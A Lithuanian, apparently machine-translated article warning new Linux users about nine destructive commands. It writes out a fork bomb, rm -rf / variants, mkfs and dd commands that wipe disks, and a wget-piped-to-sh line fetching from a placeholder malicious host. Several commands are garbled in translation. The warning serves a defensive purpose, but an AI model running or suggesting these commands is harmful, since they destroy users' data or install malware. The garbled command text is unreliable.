9 „Linux“ komandos ir kodai turi būti atsargūs

„Linux“ korpuso / terminalo komandos yra labai galingos ir tik paprasta komanda gali ištrinti aplanką, failus ar šakninį aplanką ir pan.

Kai kuriais atvejais „Linux“ netgi neprašys jūsų patvirtinimo, o ji iš karto atliks komandą, todėl jums reikės prarasti vertingų duomenų ir informacijos saugomi šiuose failuose ir aplankuose.

Paprastai žmonės skelbia turinį žiniatinklyje rekomenduoti naujiems Linux vartotojams vykdyti šias komandas. Tai gali atrodyti kaip pokštas tiems, kurie paskelbė turinį, bet kitam galui jis nėra juokingas dalykas.

Mes surinkome keletą Linux komandų, kurios yra gana žalingos jūsų sistemai, kad padėtų jums išvengti jų. Atminkite, kad jie iš tikrųjų yra pavojingi ir gali būti pakeista įvairiais būdais, kad būtų sukurtos naujos komandos padaryti daugiau žalos.

Svarbu pažymėti, kad kai kurios iš šių komandų yra pavojingos tik tuo atveju, jei jos yra prieš Sudo su Ubuntu. Kituose „Linux“ platinimuose dauguma šių nurodytų komandų bus pavojingos vykdyti kaip root.

Pažvelkite į 9 komandos ir kodai, kuriuos turėtumėte vengti.

1. „Linux Fork Bomb Command“

: () : |: & ;: taip pat žinomas kaip Šakės bomba yra „Linux“ sistemos atmetimo paslauga. : () : |: & ;: yra bash funkcija. Kai įvykdytas, ji kartojasi kelis kartus, kol sistema užšąla.

Jį galite atsikratyti tik iš naujo paleisdami sistemą. Taigi būkite atsargūs vykdydami šią komandą savo „Linux“ korpuse.

2. mv aplankas / dev / null Komanda

mv aplankas / dev / null yra dar viena rizikinga komanda. Dev / null arba nulinis įrenginys yra įrenginio failą, kuris pašalina visus ant jo parašytus duomenis, tačiau praneša, kad rašymo operacija yra sėkmingai vykdoma. Jis taip pat žinomas kaip truputį pakimba arba Juodoji skylė.

3. komanda rm -rf

rm -rf komanda yra greitas būdas ištrinti aplanką ir jo turinį Linux operacinėje sistemoje. Jei nežinote, kaip jį tinkamai naudoti, tai gali tapti labai pavojinga sistemai. Žemiau pateikiami dažniausiai vartojami su rm-rf komandomis naudojami deriniai ir parinktys:

• rm komanda naudojama failams Linux sistemoje ištrinti.
• rm -f komanda pašalina tik skaitymo rinkmenas aplanke be raginimo.
• rm -r komanda ištrina aplanko turinį rekursyviai.
• rm -d komanda naudojama pašalinti tuščią katalogą, tačiau ji atsisakys pašalinti katalogą, jei jis nėra tuščias.
• rm -rf / komanda naudojama priverstiniam ištrynimui (ji ištrina net ir tuo atveju, jei ji parašyta saugoma) viso turinio šakniniame kataloge ir poaplankiuose.
• rm -rf * komanda naudojama priverstinai ištrinti visą dabartinio katalogo turinį (katalogą, kurį šiuo metu dirbate) ir sub katalogus.
• rm -rf. komanda naudojama priverstinai ištrinti visą turinį dabartiniame aplanke ir poaplankiuose. The rm -r. [^.] * taip pat galima naudoti komandą.
• rm -i komanda yra naudojama failams ir aplankams pašalinti, tačiau prieš pašalinant bus rodoma eilutė.

4. komanda mkfs

mkfs gali būti pavojinga jūsų „Linux“ sistemos komanda, jei nežinote jo tikslo. Viskas, kas parašyta po mkfs, bus suformatuota ir pakeista tuščia Linux failų sistema.

Visos žemiau nurodytos komandos formatuos standųjį diską ir jam reikalingos administratoriaus teisės:

• mkfs
• mkfs.ext3
• mkfs.bfs
• mkfs.ext2
• mkfs.minix
• mkfs.msdos
• mkfs.reiserfs
• mkfs.vfat

Komanda mkfs.cramfs tai padarys tą patį, kaip pirmiau, bet nereikalauja administratoriaus teisių vykdyti.

5. Taro bomba

The derva komanda naudojama daugeliui failų sujungimui į vieną failą (archyvuotas failas) .derva formatą. Su šia komanda galima sukurti „Tape Archive“ („Tar“) bombą.

tai yra archyvo failas, kuris sprogsta į tūkstančius ar milijonus failų, kurių pavadinimai panašūs į esamus failus į dabartinį katalogą o ne į naują katalogą.

Jūs galite vengti tapti deguto bomba auka reguliariai kuriant naują apsauginį katalogą, kai gausite tar failą ir tada perkeliant gautą dervų failą į šį katalogą prieš panaikinimą.

Jei dervų failas iš tikrųjų yra deguto bomba, galite tiesiog pašalinti naujai sukurtą katalogą, kad jis atsikratytų. Kitas būdas išvengti deguto bombos sprogimo yra per -t parinktis išvardyti visą tar failo turinį suteikti jums idėją apie tar failo turinio tipą.

6. dd komanda

The dd komanda yra naudojama kopijuoti ir konvertuoti standžiojo disko skaidinius. Tačiau tai gali būti žalinga, jei nurodote neteisingą paskirties vietą.

Komanda gali būti bet kuri iš šių:

• dd if = / dev / hda iš = / dev / hdb
• dd if = / dev / hda iš = / dev / sdb
• dd if = kažkas iš = / dev / hda
• dd if = kažkas iš = / dev / sda

Toliau nurodyta komanda nulems visą pirminį standųjį diską: dd if = / dev / nulis = / dev / turėjo

7. „Shell Script“ kodas

Kažkas gali jus nukentėti suteikiant jums nuorodą į apvalkalo scenarijų ir patvirtinate, kad jį atsisiųsti ir vykdyti. Skripte gali būti tam tikro kenksmingo ar pavojingo kodo. The komandų formatas gali atrodyti taip: wget http: // some_malicious_source -O- | sh. The wget atsisiunčia scenarijų, kai „sh“ atsisiunčia scenarijaus vykdymą.

8. Kenkėjiškų šaltinių kodas

Kažkas suteikia jums pirminį kodą ir prašo jį surinkti. Kodas gali būti įprastas kodas, tačiau iš tikrųjų kai kurie kenkėjiški kodai yra užmaskuoti dideliame kode ir tai gali pakenkti jūsų sistemai. Kad būtų išvengta tokios atakos aukų, priima ir kompiliuoja tik šaltinio kodą iš patikimų šaltinių.

9. Dekompresijos bomba

Gavote suspaustą failą, ir jūsų prašoma ištraukti šį failą, kuris atrodo labai mažas, bet gali būti keli KB. Faktiškai, šiame nedideliame kompresiniame faile yra labai suspaustų duomenų.

Kai failas yra suspaustas, išgaunama šimtai GB duomenų gali užpildyti standųjį diską sumažinti sistemos veikimą. Kad išvengtumėte šios situacijos, visada nepamirškite priimti patikimų šaltinių duomenų.